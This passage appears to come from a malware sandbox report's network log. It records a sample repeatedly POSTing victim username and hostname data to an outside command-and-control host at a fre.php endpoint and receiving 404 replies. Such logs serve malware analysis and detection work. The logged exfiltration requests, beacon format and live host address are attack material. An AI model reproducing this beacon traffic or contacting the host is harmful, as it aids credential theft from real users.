                                  Oct 25, 2024 10:21:11.347065926 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:12.310941935 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:12 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  56192.168.2.44987194.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:12.687748909 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:12.693350077 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:13.646570921 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:13 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  57192.168.2.44987794.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:13.806746006 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:13.812455893 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:14.786429882 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:14 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  58192.168.2.44988394.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:14.951975107 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:14.957762003 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:15.914707899 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:15 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  59192.168.2.44989494.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:16.544763088 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:16.552284956 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:17.523474932 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:17 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  60192.168.2.44990094.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:17.689528942 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:17.694981098 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:18.678745985 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:18 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  61192.168.2.44991094.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:19.199512005 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:19.204894066 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:20.169209957 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:20 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  62192.168.2.44991794.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:20.320362091 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:20.326056957 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:21.278759003 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:21 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  63192.168.2.44992494.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:21.435635090 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:21.441410065 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:22.428572893 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:22 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  64192.168.2.44993494.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:22.902010918 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:22.907366037 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:23.917716026 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:23 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  65192.168.2.44994094.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:24.067897081 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:24.073734999 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:25.059734106 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:24 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  66192.168.2.44994794.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:25.569238901 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:25.575978041 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:26.544379950 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:26 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  67192.168.2.44995494.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:26.699541092 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:26.705064058 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:27.664477110 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:27 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  68192.168.2.44996394.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:27.821489096 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:27.827106953 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:28.795599937 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:28 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  69192.168.2.44996994.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:28.945952892 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:28.952301979 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:29.966038942 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:29 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  70192.168.2.44997594.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:30.114675045 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:30.120093107 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:31.093755960 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:30 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  71192.168.2.44998594.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:31.238934994 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:31.244678974 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:32.205862999 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:32 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  72192.168.2.44999194.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:32.346360922 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:32.352236032 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:33.334688902 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:33 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  73192.168.2.44999894.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:33.489151001 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:33.496323109 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
